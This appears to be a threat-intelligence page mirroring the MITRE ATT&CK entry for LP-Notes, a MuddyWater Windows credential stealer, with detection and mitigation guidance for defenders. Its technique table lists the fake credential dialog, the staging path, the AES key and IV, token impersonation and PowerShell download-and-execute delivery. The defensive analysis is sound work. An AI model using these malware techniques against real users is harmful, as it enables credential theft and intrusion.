S9036: LP-Notes
LP-Notes is a C/C++ Windows credential stealer used by MuddyWater. LP-Notes was named after the `lp-notes.txt` file that is used to store stolen credentials.[1]
Analyst context for executives and security teams
LP-Notes is a Windows credential stealer associated in ATT&CK with MuddyWater. Its business significance is not just the malware name, but the credential-risk pattern: captured passwords can turn one endpoint incident into broader identity misuse, remote access abuse, and harder-to-investigate lateral movement. The ATT&CK relationship to a local file named `lp-notes.txt` for stolen credentials gives defenders a concrete artifact to validate, but coverage should not depend on that filename alone.
Executive priority
Treat this as an identity and incident-response readiness issue. Leaders should ask whether Windows endpoint monitoring, PowerShell logging, credential-theft response playbooks, and account-revocation processes can work together quickly when a stealer is suspected. Because ATT&CK provides no official detection guidance for LP-Notes, priority should be on validating evidence collection and response decisions rather than assuming existing malware signatures are sufficient.
Technical view
For SOC and IR teams, validate coverage around the related ATT&CK behaviors: GUI credential prompting, PowerShell execution, process discovery, local staging, archiving of collected data, token impersonation/theft, Native API use, and obfuscation/deobfuscation. Investigations should look for suspicious Windows processes creating or modifying credential-like staging files such as `lp-notes.txt`, PowerShell used near discovery or collection activity, unusual token manipulation, and follow-on use of valid accounts. Obfuscation-related relationships mean static file matching may be brittle; behavioral correlation is more valuable.
Likely telemetry
- Windows process creation and command-line telemetry
- PowerShell execution logs, including script block/module logging where enabled
- Endpoint file creation/modification events for local staging files, archives, and suspicious credential stores such as `lp-notes.txt`
- EDR telemetry for Native API usage, token impersonation, and suspicious process access where available
- Process discovery indicators, including enumeration of running processes
Detection direction
- Do not rely only on the `lp-notes.txt` filename; use it as a high-value hunting clue combined with process lineage and user context.
- Correlate PowerShell execution with nearby process discovery, file staging, archive creation, and credential-access indicators.
- Tune for suspicious GUI credential prompts or credential collection behavior, while accounting for legitimate administrative elevation prompts and enterprise tooling.
- Review whether endpoint tooling exposes token impersonation/theft behaviors; this is often a blind spot if only basic process and file logs are collected.
- Because official ATT&CK detection text is not provided, map detections to the related techniques rather than to a single LP-Notes signature.
Mitigation priorities
- Prioritize rapid credential containment procedures: password reset, session revocation, and review of affected accounts when stealer activity is suspected.
- Harden Windows logging and endpoint visibility before an incident, especially PowerShell, process creation, file activity, and identity authentication telemetry.
- Reduce credential-theft blast radius through least privilege, privileged-access separation, and strong controls around reusable credentials.
- Validate controls that limit or alert on unauthorized PowerShell use, suspicious token manipulation, and abnormal local data staging.
- Use tabletop or IR readiness exercises to confirm SOC, identity, and endpoint teams can coordinate quickly on credential-stealer findings.
Analyst notes and limits
ATT&CK identifies LP-Notes as a C/C++ Windows credential stealer used by MuddyWater and notes the `lp-notes.txt` credential storage artifact. The object has no ATT&CK tactics listed directly, but relationships provide technique context across credential access, collection, execution, discovery, stealth, and privilege escalation. The MuddyWater relationship provides threat-intelligence context, but local conclusions should be based on observed telemetry.
Official detection guidance is not provided for this object. The supplied data supports Windows as the platform and the listed related techniques, but does not provide indicators, hashes, command examples, confirmed exfiltration behavior, or environment-specific prevalence. Detection and risk decisions require local endpoint, identity, and incident evidence.
LP-Notes
LP-Notes is a C/C++ Windows credential stealer used by MuddyWater. LP-Notes was named after the `lp-notes.txt` file that is used to store stolen credentials.[1]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1106 | Native API | |
| Enterprise | T1056.002 | GUI Input Capture Sub-technique | LP-Notes has displayed a fake Windows Security dialog box to prompt for Windows credentials.CitationESET_MuddyWater_Dec2025 |
| Enterprise | T1078 | Valid Accounts | LP-Notes has used stolen Windows credentials to log in as the users.CitationESET_MuddyWater_Dec2025 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | LP-Notes has decrypted strings with lengths ranging from 15 to 19 characters using the same decryption key for each string.CitationESET_MuddyWater_Dec2025 |
| Enterprise | T1074.001 | Local Data Staging Sub-technique | LP-Notes has stored collected credentials in ` C:\Users\Public\Downloads\lp-notes.txt`.CitationESET_MuddyWater_Dec2025 |
| Enterprise | T1560 | Archive Collected Data | LP-Notes has encrypted collected credentials using AES-CBC from the CNG API and the key ED15C8344B45DAED1E0578F8BC1A32411812C61F4CB45D89B107287DE0E09FFC and the initialization vector 91A4E6F6D51DAEE773A8F00279792578.CitationESET_MuddyWater_Dec2025 |
| Enterprise | T1027.007 | Dynamic API Resolution Sub-technique | LP-Notes has dynamically resolved API functions during the C runtime startup.CitationESET_MuddyWater_Dec2025 |
| Enterprise | T1059.001 | PowerShell Sub-technique | LP-Notes has been downloaded and executed by PowerShell’s`Invoke-WebRequest` and `Invoke-Expression` cmdlets.CitationESET_MuddyWater_Dec2025 |
| Enterprise | T1134.001 | Token Impersonation/Theft Sub-technique | LP-Notes has impersonated the security context of the taskhostw.exe process via the `ImpersonateLoggedOnUser` API.CitationESET_MuddyWater_Dec2025 |
| Enterprise | T1057 | Process Discovery | LP-Notes has searched for the process taskhostw.exe.CitationESET_MuddyWater_Dec2025 |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | LP-Notes has used a custom addition-based function and a string stacking function for string encryption.CitationESET_MuddyWater_Dec2025 |
Groups, software, and campaigns
G0069: MuddyWater
MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).[1] Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, finance, defense, and oil and natural gas organizations, in the Middle East (specifically the UAE and Saudi Arabia), Asia, Africa, Europe, and North America. MuddyWater has reused domains dating back to October 2025, and has a preference for NameCheap and Hosterdaddy Private Limited (AS136557). In late 2025 and early 2026, MuddyWater used commercial satellite internet (i.e., Starlink) for command and control (C2) communication. [2][3][4][5][6][7][8][9][10][11][12][13]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | cf3c26736ce5… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
ESET_MuddyWater_Dec2025
ESET Research. (2025, December 2). MuddyWater: Snakes by the riverbank. Retrieved February 17, 2026.
Open source URL -
[2]
mitre-attack S9036Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.